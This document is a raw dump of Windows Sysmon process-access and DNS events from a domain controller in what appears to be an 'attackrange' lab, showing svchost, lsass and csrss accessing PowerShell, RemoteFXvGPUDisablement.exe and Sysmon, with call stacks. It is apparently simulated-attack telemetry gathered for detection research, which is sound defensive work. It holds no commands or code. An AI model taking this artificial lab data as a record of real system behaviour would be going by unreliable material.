15:51:01.066{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000942Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.066{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000941Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.050{D28789B6-7C64-5FA1-1300-000000008801}12241976C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000940Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.035{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000939Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.035{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000938Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2184C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000937Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-2E00-000000008801}2176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000936Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000935Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C64-5FA1-1000-000000008801}11441264C:\Windows\system32\svchost.exe{00000000-0000-0000-0000-000000000000}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000934Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000933Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000932Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C64-5FA1-1000-000000008801}11441264C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000930Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000929Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000928Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-1800-000000008801}2140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000927Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.988{D28789B6-7C64-5FA1-1000-000000008801}11441264C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1800-000000008801}2140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000001917Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.940{D28789B6-7C65-5FA1-1B00-000000008801}2176win-dc-807010.0.1.14;C:\Windows\System32\conhost.exe 10341000x80000000000000001916Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.847{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C75-5FA1-4F00-000000008801}4084C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001915Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001914Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001913Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001912Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001911Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001910Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001909Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001908Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:17.847{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001907Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 